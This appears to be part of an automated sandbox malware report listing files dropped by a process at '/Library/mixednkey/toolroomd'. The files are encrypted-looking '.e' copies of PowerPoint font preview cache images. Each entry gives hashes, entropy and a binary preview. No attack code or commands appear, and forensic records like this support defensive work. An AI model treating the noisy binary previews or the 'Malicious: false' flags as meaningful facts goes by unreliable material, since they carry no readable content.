.u..D..j....P&.QR.a.I......,....E?.p.}`......h...&.+.B....R....t......8..../..&E@.."@O..=..7A...u$.....[j...%[.w.>(.;-..#...s...!........(._2..P...I.....q..XG]......m....S.qS{\|....2-v9qP..^..D6..'..W._9i...n..@.h.r._.o..ra......._..A1..P..P..xX$U>o..c.~o9.O.Z:B(....pVh1...bs.N2..#..zh...g.!.g......>...........*.O.n.2....k...`..V......S...!..1...H.O...)......6..Q.u04..b....z.@..\|:t........G...5.....G-../........y....zn..D$..?....p..=..t.9j..P.k'Iv..3.xaS.F..i..[{u.r.?eVr#.)g.9g..q\|...a.R=..+i.....'...........d.j.f.b.X.."n...h..........!..g....u..).......+F.....ktd.......\|s.H...P..t.".15..Uwx.E._....[..1.w:.2E......e.....(.S...\|1Z.att..}....

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial Unicode MSRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1826
Entropy (8bit):	7.6098173727854475
Encrypted:	false
SSDEEP:	24:EW9htnq57BIR8iiC0zQ/UxJmi6WVI1x7EguQTiS2VylKzFsePc0m7:EWntn27WR94ln6W6xAXQrl0FNpq
MD5:	DB127A84A9C57F1B6819D8C2E05FFDBA
SHA1:	7510BB80970CA01FEFBCB69DCD031724F433F2D5
SHA-256:	FB25A5E18C5A56939621BC212A40FC3EF0CDDEFBC549D8FB1BB1011A554B05E0
SHA-512:	A1E004276F6F44B6D4F9ED341CC1EFEB722DC4F3E8D7537FD8B86ADD15E168686C839388AB5D7FD669BA1DA1BAC7C6401A83AC1B3D56B5EBF212E0540B65A70A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.b.S..+...+tWJ.:. ....u......=&...s}......j!..T-]%..J..\..m]...e..y1Q........y...'.4.U....j.7.u.....,..t(gt.XY..[...XY..[...XY..[..sp..P.(..........H..\...B.8..ja(Z]~...].qmX.L...x..%..&I?.$L...X...6=...........?(..0..V..F...L=,!..(6c.......6.z....G...2.....yl3`.....8.Hk~...c...le.9..$.] ..]g..#W....)..5u#.O.......t._[.\g........wJ...x....'?D.....j..".R..U1.,...t ....m\|/....H...M>p-!.@.U...p.;....1^.z......V...qw....R...j.f.C.......n!JW..L>)}...'......\../.8R_b._. ..:.......e... ....\|.3i.7J^..I...v..-..ZxZ%..GX..$h...&.]q).\|..>..j}....\|H....+I}..m.X:..:...k.]?.....}.......>.&..1.K;..uAN...sz\|.Z..?.X]..4..U.......Z....$:!;2@... kCZ/p......W.k......<...&..fE...e..TtB.B;ZU{;nl........rV.R.........km 5De&.q...aZ..k.$...2......b[\|.j..#.......g.../..X.^.....T0x.x_...`&..$.../ZQY.h....'.....!.(.^......-.w.f.."N..+..Tr.^.u.6.z9l...K..,....Wg).#>.6.C.Y..J...R............J... (.,>...$.?./.......qt......

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ArialNarrow.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	866
Entropy (8bit):	7.009993107268725
Encrypted:	false
SSDEEP:	12:WvyOAqKL67XFxqO+Ny1LEXYZEkSQMyDDaIx0b7Y3vywCkPrDJvpb4CssewLYTc+W:EW6zDqZNy1LokHeHY11j4CssePc0m7
MD5:	4489C8E94F876D9908A37D80D544B902
SHA1:	8FC86F9B90DB50F4BB915A913A2F9EC77AB7B0CF
SHA-256:	E4572DF057D9CD258AD4E01CE2EC3E3610A75F11CF751FFFBAD6D3D8B22F06A1
SHA-512:	EB4D57CC61651A5066360D669C2BAE565561DE874B3C584F75BB65B35D51BC3858AF4779ACEC9C9DC82C1AC2691157F57E5424068B1E26F4B019ADF611CB13AF
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..'/.I&qj....;........E......-..w..M.?........3d.$.t.~........VFL....{%#"..Z......-.?%o.?LY..IW11Pof..~..;.....&0..1..wp..2.2..a\|$.".D!.+.....n.Nj,.\....o%.Q....{.......4.F....._....Y.z..8..f.DKt....68..d..=)...:s.....C.j.wy...[mQW.....YU.u.7.Gz.,..S..U]c.."{..?.w.......P....5j..2....4...yd.F..........&,.B.R....RN....t.@.Z..8.`..]0...e..E#;[......6....3^V...#....o....5U_..+.%.H...".koR..=..NG.p.=...4I.'.X...&..gs...o...D..S.../.}..Ko..x...lF....,...r[>.o-.#.v.>q...N(...S..._<b.3..6..1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ArialRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	938
Entropy (8bit):	7.127199601979192
Encrypted:	false
SSDEEP:	24:Eif1ujSiB4eHwTDFVE7dluDQvesePc0m7:EifQbHMhswlNpq
MD5:	14B4E3A8063AC713DA2972D18C10E0A7
SHA1:	53F70BCA3BF01FA511A25FF2B93900EAC129F38F
SHA-256:	29CF2E84A89510A2365AC876C2D6BC76B9BF1EE280BEF518179C39759174DF4A
SHA-512:	5D4406BFD6CA953BDBA752D1AD41EAD6678D7CC51700E2E5C5437BA2803AE99CFC89F36A6E99DEBD18FEB7CF214EFF02A579725A530068EA41141217510973EB
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a{..'....'....CKYA.J.."..R.....s_.n...[.~..&w.....I^..}...r.V...Yd...k.Qt.e."0T.I...P.e3s...;.;.e....J.;7...k.....L#.&8.b@o.5. y..6....(Q.{7...F.......tS&.3&d.6.-..Z(..\|....8J..}...4.ixa.f...n.N..../......~z.Z.j..j.-..{'..6a).>.K..wa....-o.aK.s..H..4h...\|.Mn...T.z}]..u[......qZ...q....q.....)..&.}.F...:..J.<{!.J&...:.BL...H.r.:............4ON.3k....9.,.e....bVC..,.L..(a^.3=.1U.....:+2..1...xU..c.f.=.3P.._O..?<.Ew....9.]W.h..N..k[.....3.L....hJF.. ..W..U..r......y%.W.?....9..6.Wi.g.........h.....X5T.......-u.j../..f...+....L.. @r#.Z7.E\.:.p......y.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AthelasRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	7.370492219086692
Encrypted:	false
SSDEEP:	24:E6g3uGM2Ziw1zGwbixRYcooLfhi1jov+yEksePc0m7:E6guRGfMTbLfhi1jov+yZNpq
MD5:	9791A38F35927C52FAEB0CBF58C22328
SHA1:	C446777A9EB02673A97121AEF55F5C8F1B2A99FC
SHA-256:	339482A46C153A49206CEDDA3AE7D162A4E71AF88831924F6AA4289ECAD83D77
SHA-512:	A14B9C52B6388C4EAD1123166D4E00CE7856EBFF14B26930E5D9F1B2CC8EB89977A444C914DAF8C4EF44FD7DC2E32E272B82078947C23338201EF817AFD8BED1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.S\|n....&......v.(.^...hg..m{....ei..@.I.`HI.P.A.6...}.+.y.C.w..<.yz..A.)....L...yM..e..,.].5"....$.".u.9).d:~o..O.........\!6A.Dc...$.........[.r..b\..c.9....8.x..Y...m$.#F.f@p...... .V`{2<.;...P....9.u.x....HL.{Xm#.9..(......O..2...s.GrwY..X..Z$S.3MN.~.~En%O..H.2...y\\V..0.s......+..FdV..\|2.b..4...../.L.`....v...q.G.9-.../@.1T.z..u/. ......9..\|9.....'.ZDTKq....h%.............&..0.m.LO..1E...GY.V'..T....494.+....j.~.'!u...y.J..N.L..h.....j6.......".x...$...b........'.;l..8..../.lSXF.rk.<.....@].Ws...q3....GsC...l...J.h..CtA .BLG.......G.>nx{..AP../...i"!.\|.F.+.)....Qce+...p..T.S.KM;'..98.ar.......k.Q....iv.Cx....]6P#..~7...]..U..p.)z..M6L2@...K.+.b.b.......H}.......ee...G...#f...m=..x..PC2H+{.nu...,..:...{.u...L.g..)P.h&'.L$L.p^+$.V.d!..z..wk.:..W..\w..9....N.C.m..=...B..1...g..........t!........uFh#..9...s.b..V0...}.e}~doIm..rM...."G...................\.........^./k..`R..V5..jd..ysVT*9.X

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Avenir Next CondensedCondensed.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1962
Entropy (8bit):	7.63430617591342
Encrypted:	false
SSDEEP:	48:EJjx/ZZuMPOlwCKT0tTiikTP9e+VhTe71jVL6ZrhrOsBbfWI7Npq:Sx/VOlYT0tTiDe+Te3OlOsB/7u
MD5:	9C3D73D696C8268E664D2E2C6A846B2D
SHA1:	68EBD1B5E47F4888E6C0E2A11F7703D217055255
SHA-256:	4D230DE8F66CED8B8540FF4E31A3A82B7C91F6C1900C850C3F2B4165D77049C0
SHA-512:	05D188D6F6CE43A22F9E85EFFB2A60B7DFF38C665C9676B16242F14C4F46AF5F0218D33C3359C0E44F81D13D28F1719EFD7A332B3267812EFCDF250AFCE3A8F6
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aR...}D.D.p..D.y..;.i...L..@j...^..(>.H....$eV..X......U'..U....;$......[."..d.4....E...........7/L.........RX.^'PS.RX.^'PS.RX.^'PS.=...o.....@.z.6.Y.n\|.....f...Q@.'..5_O...@..c5.,O....Y.G.A` ..JD..d.oX.&7p.s..."....c.}f.Q.l..T............A.F..S.f.!..{@i.e..5.~.=.1[.{d.d4..%..8.. .cs.<.5".)P.-R.s.._.......nK.q.N.M..s5b~2.`N..SpDL...2..m.....M)..J{......p3O...o..5.P.....w(N. ..N.2.>......L".RkWUT[.L..{..E......E.n...mL.....TTF......a.S..]..;.......e....eJJgK..X....+..G"5...L.....j.v....h......-....%:D-......./.;.>0....!.;(`.C.f.Q..T/(.1.....8...<...yB..^~....5.uH."....+.......3.$2.G.......5..i._.....3.g(6.,#j.@4....=.X:...................x.n\|..y...wx.....x...E..\.z....;.s..9e2k.(..$+..qz5..R,`..V.$...6@S..w.X}.....7l.c..1...r=^.)...Ji....K.8.X3.........#Z[t.....x._._n..;3.........\.....h...@L,.;.I.V7.k..Y.L....Yp...=Z........HNX..'z#...8.._Iw....P....b..5!w*O$d.g~..$..IR...R8...b.bI]=.0.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Avenir NextRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1418
Entropy (8bit):	7.455642452790092
Encrypted:	false
SSDEEP:	24:EBsizSHke8T9lSegAzWKdktjv7+2cYvrO5xhOhkIN9B5kmULsePc0m7:EBxYkv9lcAjU7+niahkNb+3LNpq
MD5:	5D07099DC3AE4683B889CD67512F33C1
SHA1:	F255285D592DD83E416E49C2DD0F730EA94B3E4E
SHA-256:	B5D33D6168238BA6EFA61C9B37B9E332CB2034A38E7490928AE2351E17458FD3
SHA-512:	2A001835B0E189220BB918AEAA75DB34EBABF80A26402A07CB2F3DBE9D5FB303F60080A43B7CEB301922C6C488B99C86DB23BF153063E0315F87124465EAF048
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...7F....d...<X...{......^..q..d.l[5.Uq...l>..5..../...C.M.......M.....:au...j...~.?0.e.u........m.U....iG..$.p..o..<..>'AFfd..z-.G..[....Z5.++..YvB.h.......V.r..Y.....R.c%.br........}A.....6#F..,......zj..Z.Q...n..F._.V......jb....+..J3.k...!....M.._4u8..s.K1.T.Um7{..r..H......;..z...WB...G(.).nV.7.X.\t.z..K..G.a...C.+.V.?).aR#Y.....o..b....C.-.....nj.oH.m.....0..~3i].m..8C.........5..H...\|..?.L....R..H\|l.?rO~.Q.-...L...E....I.>.2..(J..#.G.G<.w_Jp..r.c..\|3Z.`.%'..8.J....b!...?`.\|..N?..L.O...5k.5..g.I..[....Ts&.!......+..S2.'4>^[.FI....c:.#.dE....Zr@..\|...>.H........>T.N}..;8.Q.I."..e{.i...P.......K..S.9...."c_`.....rAa.....Y+.^MK...oOD.....Ma.....8.I.\,b....K......7...bA.y>.E..?....0d2....4..FZ..8.\|....Q..G.mA....Zpg...`.w7...q....V+=V....C.D.A."h........Mx...Wt.ys..rl...m+0_....i.s......Nli............+uu..9aR...\|.....n..i.........7Fn.0,.e5>.]g.<.&......J./.Q....*.Y..;...D.3N....).c.cv

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AvenirBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	7.160632584023256
Encrypted:	false
SSDEEP:	24:E7Tr+mks6Foaupy0Kvfgoml4x2EBY46sePc0m7:E3r3LqkbKvfNx2EBL6Npq
MD5:	1B69A0C07EA3DAB1A160D9B98B3AAC0F
SHA1:	19C4BAF83A83ED42AFA480A06AA5B178FACE2597
SHA-256:	803464478CA2901875396F43622F0E26C7D9FD8A63E63504BC55BC2E2870F930
SHA-512:	E0629D957E037C23B31EDD8E20CF90A54C7EA867DEF47BF24A2EC385B5E2E8D4BA3DFA8E1968EA2B6C84BF97D9AB1CFFEDC75063CCE3202890C2D587A0185C32
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a3....z......3V...:...e.K,,..9\|.. ..+.zH..f...............+dp#dg.......<...]......-p\Y..Q..S.=.k\|.~#2R-.-5"s..}m....t..G.......e..Z.kT......k..b`..._...Y...w...3.[..F............h.........t.f9.LQ..e...Y''[D...V.<..mm......R.6.4....0=.NQ..{.E.....v$x.............n...;..\..ym.]8.I.....8K......gg....r....0..W;..\|/.S.y.....^RI.c....a..........aG..-K..N..%o..[..l....r...f...,....Y.N.N..$...a....z."...eb..q...L.....{.\...@..[.....w.w`....z..6^mN..ds.;WY....%..o.#........]...Yv.U..}..0+..\.j.n.95. ^"..%.....0...\|q.N.fA..i..~..t......Q.......q...f.<....a.2...FaDv...Ge.....Hd..e.1_.)\}..I.H.Xk.;......f69.~#2R-.-5.]..&...,.d...yD.\X.Zd.o....q....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AyuthayaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1362
Entropy (8bit):	7.444600624272667
Encrypted:	false
SSDEEP:	24:Eh1TsjzsjvWDZrPO/i443pilizpAQl0zowwUtckLRZYSrosePc0m7:Ej+z2v0O/5itAtowwUZLwSroNpq
MD5:	34FDB16AB26DDFD6F574F3FA6631FF5C
SHA1:	8CFB61970A03F29664E359B6B85C866EB7DF38AD
SHA-256:	EF20639C0DC58557A04C3D2F42C83E2F93DDFE1C825867B8539A76732F99DDB0
SHA-512:	38C50116EF64DC27AFD2B23B34F70FF07C345598ACFABCE7F62EE44F3CCED2CA7372C1A48199ECCB6FC9678762E23839ED8026B412681658254A71635EB62081
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.3.........."b.h.E..b.p....2.....uj.x..i...68D....o.u@5.P..........3...1...jK.u.....j0\|%..e.K...8/.../O0..6..S...l..gP.!B..&4.fW:..l.J./_Q...1_.r..oS...s..<....".......o....4.#.+..4.0...+j.T....".M.^.Kv..?..k....r~._G..l.X....CpLyI<.n.v...u....n.....j.4..N~$z.T...$.8'.0(.uo.C/...YU...0.+.X'.GWo.i......j..W .'..u./.8.s.........b.w.#........L.h.C...r...t..q..$...}...Z.&.(...:..vV.H.x....&GC...=.t...i.Ht.u....@".....:YZ#>[.....9....'....]../S.....K.......5......p:.qi..zt.x.,.U....F.......&H=}...%.C.<Q4.>...d.3....2u..._..j1A...C>.O.+..L..7...M...J..0..yI.!.&.Y....y.. ...&.....(Zl....m.:...<...-.2...&........<..hg.O....F\+..Xu$RF....}....;..J.&.[F.s...&.9...6`.G....k.4+.l....S...m#..y".....GK..o...x..]...\|...+'....9)8...39....N.sj#.A@.`..U..#/E1....?...c 4(+...-.F.J,xG.P..x......#3..n....sG(..."..h.H...`...-...?@.ga....w....w..m..a.#'.........`.na..h]..V8..7]W.B..\|1.@.9.]...>.h....+.....H".JV9j

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BaghdadRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	7.476579279026195
Encrypted:	false
SSDEEP:	24:EP2NgPnyM8DB83vjG6f1/5f+6fPgP1zKmUCosePc0m7:EP2NayM8N+vi4NJPaztsNpq
MD5:	2B6D1A8C65F86C15D82B576874DA7FA6
SHA1:	BF8808D474AAE7E3889155C076EDBF10945647E8
SHA-256:	A65E76A0DE5C55F3C9ED8555FD7FD0DD6D5C462688AD657AA4A20B1369DB7ADC
SHA-512:	4AE3B8CB1DE588BFFD1D62E8F1AE1A9041527F0C5A7509330EA6197CF6E0C5C802BE612A9AE07E76E5B4B1863E8E4D62079592029F56DA596E5E6D7648175482
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.-B+...M.......H?]....._$12>.......>]Ii%.Fv.c?"..Nj.t.fq`....Vz...9_..,lz..g.\np.....sh... ..?......"..s.X.7....#...R'R.4.....JF..$L2.H?.".>.....0..'Do.q/d..Ae..8a&>..-X..(..sc7.\"...:........{.r.....X.a.'}...{;....)+..W.0..../0+...R.(/...&_.DSz.?......>Z...[....R...<.f\..U. .....\7.A.Xq.L..C...4....2.....4F.....y..^...%..n..y.L.^..LN.J.'....D..6...]...<.L.wI...v...0..l....+e.>......Y lZ=..\|\|xO ..>.. .`[..#Sv.^.R.z..IbeX.k..G+.0....S..B).P......p..XH.1l...~...2W/.&q..h/..A3.6.....^G.0.....>. .l..H\...D.FI..Zm@.F..O......j<V../...G..v..T.}..B.;.tH._.N..E.z...$...y...d..a.X.hf...Vwo;1J.K....U.q.7..\|.o.:hN..M.s0......?.w.S...^..i.....+.N.u..bZ....3..>Lt....5..o.............+..b...8...w.9HH....2B\O....!/.. .....%....6.B.E...A\.......=PG..@.9.....e.jL...!9......0Z..q..9...C..Z...^....V...n!.{p..?B.V.^%.f.P..bE.-.{/..A."...sm]..G}......\|.7r......x..f\m..r..ZY....C..m..L1b..P!..ko ,p..9.M

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bangla MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	7.4869192933613045
Encrypted:	false
SSDEEP:	24:YunHizSmVRQ/bCcPqhiiatkdk1PRpLnPlPpFYygVX79XYskYsePc0m7:YuOV/QjCsqkiaC2trPtpF2VXZXdNpq
MD5:	39DB58CD712D96877BA584E2BB393835
SHA1:	2C173059E2298B25129DE96E6854629DB2F8F57A
SHA-256:	95F2A1CBEC7BDF5BE690FD3FA3AA252B709CEB036A1B35321FC5B06C887A69C8
SHA-512:	88BD2B6579921C37660DC2FD4758DF9C4B6A6EB09AA1104D7084808946B2DB3F3989E368FD890CC1523BA5E6F258FD2DBF8C908FF6A942905071C55F3504A54F
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a...[:.b..%.WS.V.!0....v.D.6...i..D&+.&..9.....w8>...y`9..Qc.]w..0.]......!=Y..BD.;..l7U..l{..\|..sR`2.x..._V..o.#...R'R...X...P.D....P.Jy..}fs[.P..I, #.$.<;l.y5jb.h....?.Zs~S.R..I..{.;Q.M.<.d...y.tY}.....K./.$#.......c.L......O.....s....l..=.5..M.....\.b.I..A.1.h.o..M...U.7.........%PJ....X.R......\v.z.[3..b.&.k.we},i..2......E.N....6.F..ZJ...h.T.....V.S....).d.......aI...<.W.\\|!Vv7.S1b.......)gSC.o.A.AV..V.+.......k. .15..H..V&..;t.....W......S...l......`..#4....&..\|..\|;1..:7.....x.@...........?N.1.,.z...\|$...%..r..\...Z{Cp~.!..y..Xc.+..7..lJ....QI..`<.\|o.KkT.l....2.i.{.v...f.../Z....U.a.=.5..).js..U..<q.i$P.Kx.YE..z.....D...m. GC...o.....]..Kr..>"...,@P.;...b'\......W...`....1.gW..i...sl.0..^=...).U...a0~..?~w\4..."z..m..2..Yl..vt..A.X8.&..q.u.!....~.B....L.n.69..<......t.&...M..p[.U..@....>6.M.#K.'.O.E.....Z...+...Y.....c).r...I...CuR....f.g.1..L .....8)B=.p.;....kI...A>...,aw:.Y...x6.oWD.!..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bangla Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1866
Entropy (8bit):	7.628517204479899
Encrypted:	false
SSDEEP:	48:EXknM6euS8iSuFUzres4H3mClqMIJrgM96Npq:ek5eu2FhsKmClqMQ56u
MD5:	92742E57038FFC4AEF90E87F183068C2
SHA1:	DB2DD938D41D352C9E3F42419A3EA63AD109BB07
SHA-256:	8E5EFF633E0A768E0BE29CBA50622A792148652625286DAD8D181D6ED980C9C4
SHA-512:	9CEE0C775E4232D1105A3A853D647A64DCC4B5DEAD5ACE59C112323CE4CB6F5D3BF499FD12537272F8380F5CD72BDB22997933D20F6C67970AC66BED74A5A251
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...}^...{.....y....}..JX.7........4..W`........(f.bR=.Rf...$.!.q..;.G...i.....z].F..B<6.8O..[..WY=`....=.]..c.......c.......c.....\|...M...p.M5...Y.@.r.L~........G......^.F...:.w.....pP.....I`..%...Z.9$U..^#..\|zN.0].<...J.....O..}.@..lV.h`..6.0.........X...j..PH..e..Bw..K..Z1%.)Q.=...p.T.K..........z..V..v.{.dh...V.c.?....&AC..Tx.;2.........R...V7m...EYj...\|G~.......\..[.~...9.].b..%....U......,Rf...t.y._...._...^.2.ZE-aT.>.....Rr.-L...P..?.7P.=.....<kkh..=........{.Pn..7.~...........p...8.f..F.3O&..9:.lW...@u...4...]z\|b...?.DpO..#".s1.A......j.m...A.)!.2....I.O..x.N...S..{-t4#p.....b.@.....#..m%......X...4..u.C.....$C..#..L...W.in.\T.7......<Z...1.._.A."j...;-.../..F`.7..C..S!].....Y/0..<.....p3...m.s..l_u...sI.....E..P.._5..+....y..%.P.....Gxi...7.....G.."ju.`..d.V......%wY.Y.n.T.;....O...>d..d..$&@...j......S...52./....*...&....0.Iv.c......uj.\|"....s.Y.0.2...,.W\.:e....k.!..c9M.rRN...k.@..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Baskerville Old FaceRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1978
Entropy (8bit):	7.654541872409164
Encrypted:	false
SSDEEP:	48:EAqZ3K6ejeM7RPCnA590nWs2bxituZ6QQu1HK7BH5Npq:zqZ3K62ddQAuW7bxitM51qFZu
MD5:	95ED2FA27869A40E0EC81263745A3A6E
SHA1:	ACD8AD7AA81062B1B82CF2AF7E07D0CD6118D413
SHA-256:	AD10542DC9B1282EFA122C2067F3764C6D506115046906DC41456CA4F3C6B5ED
SHA-512:	8E3D2BA253A2BAD1A49BAE700C2436B30FFFF4545DEC5B5D39ADC6A35EAC3DA79159ECBF4F763D322D3552ABBE6E02F08C49AE0F8D2E13D89694978875BDEAF2
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.....&5R.0.5..C.K.F..c.=;....%..u.....p.s..(......w..Y.z....ca.).....z./[Jlv..v..:......^....=...D.....s....,.X&.4%h.o.&.4%h.o.$\|......l.B.Q..yt.8.K...bl.t....\B.g..@)kL..)1@Z..L....t..E'..\|..gT.M.!......P...r..\...!.z.......$...K.\_...R%.0Q.z5.E.e.p .J...n.F.L.q.t..U"...........E:...9.UL.\|&..U..<..d!.z..5.3...Gs.'.8.4...."K}..W.....z.B..,....Tj. B.I.^.(.{.A.X.]..)..qE.............,R..n..V%1ip......u.4&...o.....FG.(.....$...Wkel.[...a..Xeg..+4}.....z.a.[.cZ..~.i.+1...S..b...(.....:H........\|<..B..r.....I...=..A..IV..i..1.).s.~{.\|.N.Wx?O4..[.z....T.}f........9g.".F..r..=fX}.7nu.Y....~.Q6.v.J...mh.....K.......{..s..0......f...........Z..gyW..4...h'Z...\|.7...Z~l('z.g..k....... .....E.;#..N '.....M."Fi .U._..m?..<......qI.q..;.6E.@+t.b...?<,...7...9...t.b.F.......b....l.........<..,v\|%..w....Ll.E../]._;a.U..7..I....M..w.m#....yk....*.K.B....:..c...P.S..v..U..LM.5.ib......V.1...B...."..b.X.rW.hP.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BaskervilleRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1346
Entropy (8bit):	7.407425723273723
Encrypted:	false
SSDEEP:	24:EG2ROC6k1rpIjErrveFaKHK4fh3fqpsGkA59WRf5MGROUN25WTsePc0m7:EBOCFveF9h3fDGkAjWROtUN6WTNpq
MD5:	ADFC7521D3D19FF982E91EE6B169476F
SHA1:	4109EBE8FD9F54F2865E558D34D49FE7ABE19F96
SHA-256:	517AB38DE87C8BBF6BC5F5AEE67959AD17912191E3C4EDA20BEC48E80C5A13AE
SHA-512:	38CBFF7F21C02884E0B54BB6580C6F409804B37EA5143AEDE432B5F20326699C902543A19ED0A17FF8CD860A894B348EC042E64E2336525545087496B5C22760
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..G_...m.(}I....K+....K......+b....q..p.."{3.`.o........M6S....B.5....%(.E.......#........NX......n...'..m.U....iG..$Q...(9...R...-.M"...xt..1I...o..6e...[>.5.\|}r..p\|7......b...].{&._...q.......}...q.a..Yl.....P.U.,.v.O:.9.>..[#..-..&...g.d..`......-....~....i..Q..,.....DK..".?.<d..?_\|.....>.2>g...kx....V...1..P`.[s+....F.AI..=U...$x..!U...S...........:D....2.h..I..]{t.~M...#@........x..P....z.[....5&..K..X+......(5...:.D..\|}.@1,.f....Q.@.U..h.K..S.@t.).g.T_.?..Q.[_Y..6.7..v..GB..Np/............gO...&.)...f.(..U+.. ....1..6..m..0.....\V.G.o@".-..y... ._..l2>......pPG-....]].)O...&.yDu.l..T..,...iv.)_,H....S.U.. ....%.t.e..Q.v.......'.b.._Q.....5.l6....."...^...N.).K..Cn.z.....&...B.-M:.c...wY9....9.I.H.B(6T.q..F.@.....c......m..]v....f\...d!@....4..q.].\."q....6..96D\|r.A#>..j.b........u%.ep..d.....__:..{.._..~G......G.?0}\|.......e4..7....1+6............j..O...T...>......$.M..>.1.A+q.m..}$.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BatangCheRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	7.424798594153067
Encrypted:	false
SSDEEP:	24:Ec7iKKbxSrlLlzAhdpyY9G70zMsCXgupj1j04bQKuGLWv89yLR/XOsePc0m7:ES7KbAr92hSY4AnCXgupj1/QZFs8R/XL
MD5:	3EA861EB6EED6BAF20E5D520AA6F4653
SHA1:	D256492189B2E2229E2582319485AD4D78047135
SHA-256:	62BC31BA989FA69114C0920B7ADC5F5E8EB52DDDCFA7E6D9591ED81C42C7144F
SHA-512:	8A1DE986AF1A1492B21F1B41101B1D87269019D73641A753907E41818709FDC12557C57BF725DE47B5DF92578B7160DF8184A5D7DEF36A90B8CAB438746037CB
Malicious:	false
